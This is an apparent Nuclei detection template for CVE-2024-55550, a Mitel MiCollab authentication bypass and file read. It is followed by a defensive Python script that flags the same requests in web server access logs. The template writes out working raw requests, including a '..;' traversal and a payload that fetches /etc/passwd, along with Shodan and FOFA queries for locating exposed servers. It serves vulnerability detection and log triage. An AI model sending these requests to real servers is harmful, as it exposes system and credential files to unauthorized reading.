Mitel MiCollab - Arbitrary File Read

ID: CVE-2024-55550

Severity: critical

Author: DhiyaneshDk,watchTowr

Tags: cve,cve2024,mitel,lfi,cmg-suite,auth-bypass,kev

The Mitel MiCollab Arbitrary File Read vulnerability allows an unauthenticated attacker to read arbitrary files from the underlying file system of a Mitel MiCollab server. Exploitation involves sending specially crafted requests to the server that bypass access controls and return sensitive files.

id: CVE-2024-55550

info:
  name: Mitel MiCollab - Arbitary File Read
  author: DhiyaneshDk,watchTowr
  severity: critical
  description: |
    The Mitel Collab Arbitrary File Read vulnerability allows an unauthenticated attacker to read arbitrary files from the underlying file system on a Mitel Collab server. Exploiting this flaw involves sending specially crafted requests to the server, bypassing access controls and allowing the attacker to retrieve sensitive files.
  remediation: |
    Ensure that the application properly validates and sanitizes user input to prevent directory traversal attacks. Use a whitelist approach for allowed directories and employ proper access controls.
  reference:
    - https://github.com/watchtowrlabs/Mitel-MiCollab-Auth-Bypass_CVE-2024-41713
    - https://labs.watchtowr.com/where-theres-smoke-theres-fire-mitel-micollab-cve-2024-35286-cve-2024-41713-and-an-0day/
    - https://www.mitel.com/support/security-advisories/mitel-product-security-advisory-misa-2024-0029
  metadata:
    verified: true
    max-request: 2
    vendor: mitel
    product: cmg_suite
    shodan-query: http.html:"Mitel Networks"
    fofa-query: body="mitel networks"
  tags: cve,cve2024,mitel,lfi,cmg-suite,auth-bypass,kev

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /npm-pwg/..;/usp/searchUsers.do HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "users"
          - "Network Element"
        condition: and
        internal: true

  - raw:
      - |
        POST /npm-pwg/..;/ReconcileWizard/reconcilewizard/sc/IDACall?isc_rpc=1&isc_v=&isc_tnum=2 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        _transaction=%3Ctransaction+xmlns%3Axsi%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2F10%2FXMLSchema-instance%22+xsi%3Atype%3D%22xsd%3AObject%22%3E%3CtransactionNum+xsi%3Atype%3D%22xsd%3Along%22%3E2%3C%2FtransactionNum%3E%3Coperations+xsi%3Atype%3D%22xsd%3AList%22%3E%3Celem+xsi%3Atype%3D%22xsd%3AObject%22%3E%3Ccriteria+xsi%3Atype%3D%22xsd%3AObject%22%3E%3CreportName%3E..%2F..%2F..%2Fetc%2Fpasswd%3C%2FreportName%3E%3C%2Fcriteria%3E%3CoperationConfig+xsi%3Atype%3D%22xsd%3AObject%22%3E%3CdataSource%3Esummary_reports%3C%2FdataSource%3E%3CoperationType%3Efetch%3C%2FoperationType%3E%3C%2FoperationConfig%3E%3CappID%3EbuiltinApplication%3C%2FappID%3E%3Coperation%3EdownloadReport%3C%2Foperation%3E%3ColdValues+xsi%3Atype%3D%22xsd%3AObject%22%3E%3CreportName%3Ex.txt%3C%2FreportName%3E%3C%2FoldValues%3E%3C%2Felem%3E%3C%2Foperations%3E%3Cjscallback%3Ex%3C%2Fjscallback%3E%3C%2Ftransaction%3E&protocolVersion=1.0&__iframeTarget__=x

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"
          - "micollab_api:.*:.*"
# digest: 4a0a0047304502206dc01b21b33e157d133b796618d8ad99c4e72aa762d0bc2eecb6ce799a605463022100fe4f0e7d9065b28f5e11876d73666e3d3cb4f2a0871720ce8be19809adf4f9c8:922c64590222798bb761d5b6d8e72950

This template checks a web application for CVE-2024-55550. Run it against a target with the Nuclei tool:

$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-55550.yaml"
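
To check existing web server access logs for the request pattern this template sends, the following added example (not part of the template or of the Nuclei project) flags requests under `/npm-pwg/` whose path contains a `..;` segment. The log format, the sample lines and the function names are assumptions made for illustration.

```python
import re
from urllib.parse import unquote

# Assumed common/combined log format: src ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
DOTDOT_SEMI = re.compile(r'/\.\.;[^/]*/')  # the "..;" segment present in both template requests
ENDPOINTS = ("/usp/searchUsers.do", "/ReconcileWizard/")  # paths the template requests

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE = [
    '192.0.2.10 - - [05/Dec/2024:10:00:01 +0000] "GET /npm-pwg/ HTTP/1.1" 200 5120',
    '198.51.100.7 - - [05/Dec/2024:10:00:05 +0000] "GET /npm-pwg/..;/usp/searchUsers.do HTTP/1.1" 200 8841',
    '198.51.100.7 - - [05/Dec/2024:10:00:06 +0000] "POST /npm-pwg/..;/ReconcileWizard/'
    'reconcilewizard/sc/IDACall?isc_rpc=1&isc_v=&isc_tnum=2 HTTP/1.1" 200 2210',
    '198.51.100.9 - - [05/Dec/2024:10:02:00 +0000] "GET /npm-pwg/%2e%2e%3b/usp/searchUsers.do HTTP/1.1" 404 312',
    '192.0.2.44 - - [05/Dec/2024:10:03:00 +0000] "GET /portal/index.html HTTP/1.1" 200 900',
]

def normalize(path, rounds=3):
    """Percent-decode repeatedly so encoded forms of the segment are compared too."""
    for _ in range(rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path

def scan(lines):
    """Return one finding per request under /npm-pwg/ that carries a '..;' segment."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parseable access-log line
        path = normalize(m["target"].split("?", 1)[0])
        if not path.startswith("/npm-pwg/") or not DOTDOT_SEMI.search(path):
            continue
        findings.append({
            "line": n, "src": m["src"], "method": m["method"],
            "status": int(m["status"]), "path": path,
            "known_endpoint": any(e in path for e in ENDPOINTS),
        })
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

A finding shows only that the pattern was requested; the recorded status and the `known_endpoint` flag help decide which hosts to triage first.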